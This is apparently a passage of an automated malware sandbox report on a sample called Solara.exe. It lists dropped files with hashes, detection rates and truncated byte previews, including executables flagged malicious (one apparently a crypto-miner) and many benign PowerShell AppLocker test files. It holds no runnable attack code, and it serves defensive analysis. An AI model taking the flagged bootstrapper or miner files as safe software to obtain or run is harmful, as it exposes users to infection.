                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:data
                        Category:modified
                        Size (bytes):64
                        Entropy (8bit):1.1510207563435464
                        Encrypted:false
                        SSDEEP:3:NlllulJ:NllU
                        MD5:0FF7A8A821E17ECC359CC9F60FD6515B
                        SHA1:ADE9BA72D5154FE4C7F1666CD4F3F0EB137A9272
                        SHA-256:C9569A33D275A4DFB4DAC45D2434A357DF072A27AD23498F83B24127E2F761C0
                        SHA-512:9AF90D4E705EE4D70E1EA08BC3AB01A5061C749FED2D271E3C3F5F0775FAB7789DAAE720CA39D19AFCBB965C7DE900EAF5787A0C0CE8647FC7C775D7F8C3ADF9
                        Malicious:false
                        Preview:@...e................................................@..........

                        C:\Users\user\AppData\Local\Temp\Kawpow new.exe

                        Download File
                        Process:C:\Users\user\AppData\Local\Temp\kx new.exe
                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):5471744
                        Entropy (8bit):6.525931537093555
                        Encrypted:false
                        SSDEEP:98304:gBybWc2fgjrlVrH3Y27fd2BY1z7QDkR3m1W:hic2GrrrH3Y2Bd1fIkR3m
                        MD5:FB6A3B436E9F9402937D95F755B62F91
                        SHA1:AEA3A8A311C2B8B6FC7D9D263B952F95A30B180E
                        SHA-256:4C9D878E35E7FD497C633A770D3359FB37447985450DC19F45DB0925972C39E0
                        SHA-512:7A3E2E42FE965DB1CEBC539235FEC88E277669C9A62BE2450EA4EFAF5DD93F1DE11740197FF26E697E9E9ACC499CBA2C30B64CFA5E5B35B28B9E0B93087EE2F8
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 74%
                        Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d......f.........."...........R.....@..........@..............................T...........`.................................................H...<.............S...............S.................................(.......8...............`............................text.............................. ..`.rdata...'.......(..................@..@.data.....R.......R.................@....pdata........S......vS.............@..@.00cfg........S......xS.............@..@.tls..........S......zS.............@....reloc........S......|S.............@..B................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe

                        Download File
                        Process:C:\Users\user\Desktop\Solara.exe
                        File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                        Category:dropped
                        Size (bytes):10967040
                        Entropy (8bit):7.001181834719954
                        Encrypted:false
                        SSDEEP:196608:NaAEXnVB2t0vW54zu9cQ+6SLwC9tpg9FHh2C32cIPTv3O:NajFECvW5R9ccSLfYHhhbMv3
                        MD5:00A1864355A5EA47902E5757C0D87FD9
                        SHA1:4BE5647308E0925FB00FAE068CB4A89A8A449AFC
                        SHA-256:4289002FD7528974AE7A9BF4D855BFD3812D248A46DBD7F94E7336F260AE7A39
                        SHA-512:7F86E42676CFD77AAFD7A030656AD88D041BA54EDC6EAB41193528B03E79850F89E7D79679E6A14FFF8E69D7011E36E03D09C73A46E8FC722DC126C3DA4BE718
                        Malicious:true
                        Antivirus:
                        • Antivirus: Avira, Detection: 100%
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        • Antivirus: ReversingLabs, Detection: 68%
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L............................L...............p....@..........................................................................e..P....................................................................................f..X............................text...h........................... ..`.rdata...G... ...H..................@..@.bss.........p...........................rsrc................T..............@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe

                        Download File
                        Process:C:\Users\user\AppData\Local\Temp\Solara Bootstrapper.exe
                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):13312
                        Entropy (8bit):4.677524556734161
                        Encrypted:false
                        SSDEEP:192:konexQO0FoAWyEfJkVIaqaLHmr/XKT0ifnTJ1jvVXctNjA:HnexHAWyEfJoIaqayzKAifd1LVEj
                        MD5:6557BD5240397F026E675AFB78544A26
                        SHA1:839E683BF68703D373B6EAC246F19386BB181713
                        SHA-256:A7FECFC225DFDD4E14DCD4D1B4BA1B9F8E4D1984F1CDD8CDA3A9987E5D53C239
                        SHA-512:F2399D34898A4C0C201372D2DD084EE66A66A1C3EAE949E568421FE7EDADA697468EF81F4FCAB2AFD61EAF97BCB98D6ADE2D97295E2F674E93116D142E892E97
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 33%
                        Joe Sandbox View:
                        • Filename: Neverlose.exe, Detection: malicious, Browse
                        • Filename: Vjy8d2EoqK.exe, Detection: malicious, Browse
                        • Filename: RdJ73GU3N1.exe, Detection: malicious, Browse
                        • Filename: SolaraBootstrapper.exe, Detection: malicious, Browse
                        • Filename: QIjBj1l8We.exe, Detection: malicious, Browse
                        • Filename: 6tGWMkdYv4.exe, Detection: malicious, Browse
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....)............"...0..*...........I... ...`....@.. ....................................`.................................?I..O....`...............................H..8............................................ ............... ..H............text....)... ...*.................. ..`.rsrc........`.......,..............@..@.reloc...............2..............@..B................sI......H........'... ...........................................................0..;........r...p.(....(...............(...+}......~.......(......9...............(...+}.......}.......6}.......}...... ....}........0..{....+..}......~.......(...........,'.(......r'..p..(....(....(.......s....z..........(...+}.......~.......(....&......%.......%.......%..........+'.(......r=..p..(....(....(.......s....z..*6..(.........*....0...........(....o......rS..p(.........+8...........o..........

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1zmo0t0f.evy.ps1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_23soslmr.nvs.psm1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3w0dcd5o.0up.psm1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_40luurey.ndb.ps1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4jqn5ucm.ipt.psm1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5er20a1e.w0s.ps1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5zwsp5x0.lvk.psm1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bhniaq0k.vpi.ps1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_brr24jtc.id5.ps1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c52kkbwt.53w.psm1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dj40ussb.zai.ps1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fmlim2yl.3a3.ps1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fndp1s30.fyd.psm1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g3lbrgcd.bjg.ps1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g5jcaroi.jak.ps1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ghhode2u.qdo.psm1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i0k53z0m.4eu.ps1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kahzsuxw.4rs.psm1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ljxjklts.b20.psm1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qwkiuvmx.hfk.ps1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rpeyu3da.ahl.ps1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rzwziche.zlk.psm1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_szyfvfc2.uh3.psm1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ujqqye5q.m1a.psm1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uoqn0egs.5nr.psm1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uzsbxgh5.aak.ps1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vuhzkc22.jed.ps1

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
